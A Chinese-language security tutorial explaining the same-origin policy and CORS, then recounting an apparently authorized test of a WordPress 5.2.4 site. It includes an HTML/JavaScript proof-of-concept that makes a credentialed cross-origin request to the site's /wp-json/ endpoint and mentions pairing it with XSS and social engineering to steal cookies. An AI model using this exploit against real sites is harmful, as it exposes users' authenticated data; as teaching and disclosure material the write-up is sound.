1,什么是CORS
2,CORS漏洞简析及POC
3,基于wordpress5.2.4的CORS漏洞复现
壹 什么是CORS
想了解CORS先要搞清楚浏览器的同源策略
同源策略 (Same Origin Policy)
是一个重要的安全策略,它用于限制一个origin的文档或者它加载的脚本如何能与另一个源的资源进行交互。它能帮助阻隔恶意文档,减少可能被攻击的媒介。
该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。
同源的定义:如果两个 URL 的 protocol、port (如果有指定的话)和 host 都相同的话,则这两个 URL 是同源。
虽然SOP同源策略是一个非常好的策略,但是随着web网站和HTML5的发展光使用SOP就会显得有些力不从心,于是便出现了CORS:
CORS,跨域资源共享(Cross-origin resource sharing)
是H5提供的一种机制,WEB应用程序可以通过在HTTP请求包增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。
使用CORS的一些场景:
- 比如后端开发完一部分业务代码后,提供接口给前端用,在前后端分离的模式下,前后端的域名是不一致的,此时就会发生跨域访问的问题。
- 程序员在本地做开发,本地的文件夹并不是在一个域下面,当一个文件需要发送ajax请求,请求另外一个页面的内容的时候,就会跨域。
- 电商网站想通过用户浏览器加载第三方快递网站的物流信息。
- 子站域名希望调用主站域名的用户资料接口,并将数据显示出来。
CORS漏洞攻击原理
- 假设用户登陆一个含有CORS错误配置网站
vuln.com
,同时又访问了攻击者提供的一个链接evil.com
。evil.com
的网站向vuln.com
这个网站发起请求获取敏感数据,浏览器能否接收信息取决于vuln.com
的CORS配置。- 如果
vuln.com
配置了Access-Control-Allow-Origin
头且为预期,那么允许接收;否则浏览器会因为同源策略而不接收。
CORS漏洞验证
这是一个正常的GET请求包:
我们现在在该请求包上面添加一个origin参数:
可以看到,该请求包添加了oringin表头之后,返回包的数据中出现了对应的CORS响应头,Access-Control-Allow-Origin指是允许访问的源,Access-Control-Allow-Credentials指的是允许带上cookie访问资源,这样我们就可以通过POST获取到访问者的cookie信息。
叁 基于wordpress5.2.4的CORS漏洞复现
(此次渗透为漏洞银行众测项目,为授权渗透,但这里还是将其做保护隐私的打码处理)
某网站,url到手之后西安nmap攻击性扫描一下:
为wordpress 5.2.4版本,该版本存在CORS漏洞
漏洞存在测试成功;该漏洞存在于wordpress根目录下/wp-json/,该接口用于自定义方法从而获取网站数据,故我们利用此漏洞可以获取到网站数据:
构造本地弹窗测试POC:
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET", "https://www.xxxxx.net/wp-json/", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>
返回了unicode编码的网站数据,这是从本地进行跳转访问
该漏洞主要利用还是要结合网站域名/子域名下的XSS漏洞,通过社工等方法可以轻易获取用户cookie或某站点漏洞的数据;